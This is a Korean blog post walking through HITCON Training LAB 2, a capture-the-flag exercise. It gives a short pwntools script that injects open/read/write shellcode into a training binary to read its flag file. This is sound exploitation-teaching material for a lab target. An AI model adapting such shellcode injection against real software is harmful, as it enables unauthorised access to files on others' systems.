HITCON Training

Recent Posts

Archives

« 2025/02 »
일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28

Tags more

관리 메뉴

글쓰기
방명록
RSS
관리

ii4gsp

HITCON Training - LAB 2 본문

시스템 해킹/HITCON Training

HITCON Training - LAB 2

ii4gsp 2020. 2. 7. 15:15

orw.bin이란 파일을 ida로 열고 main함수를 보면 shellcode를 입력받는다.

pwntools를 사용하여 문제를 풀면된다.

from pwn import *

p = process("orw.bin")
 
payload = ""
payload += asm(shellcraft.open("./flag.txt"))
payload += asm(shellcraft.read("eax", "esp", 24))
payload += asm(shellcraft.write(1, "esp", 24))

p.recvuntil("shellcode: ") 
p.sendline(payload)
p.interactive()

'시스템 해킹 > HITCON Training' 카테고리의 다른 글

HITCON Training - LAB 3 (2)	2020.02.07
HITCON Training - LAB 1 (0)	2020.02.07

'시스템 해킹/HITCON Training' Related Articles

HITCON Training - LAB 3 2020.02.07
HITCON Training - LAB 1 2020.02.07

Comments

ii4gsp

HITCON Training - LAB 2 본문

HITCON Training - LAB 2

'시스템 해킹 > HITCON Training' 카테고리의 다른 글

티스토리툴바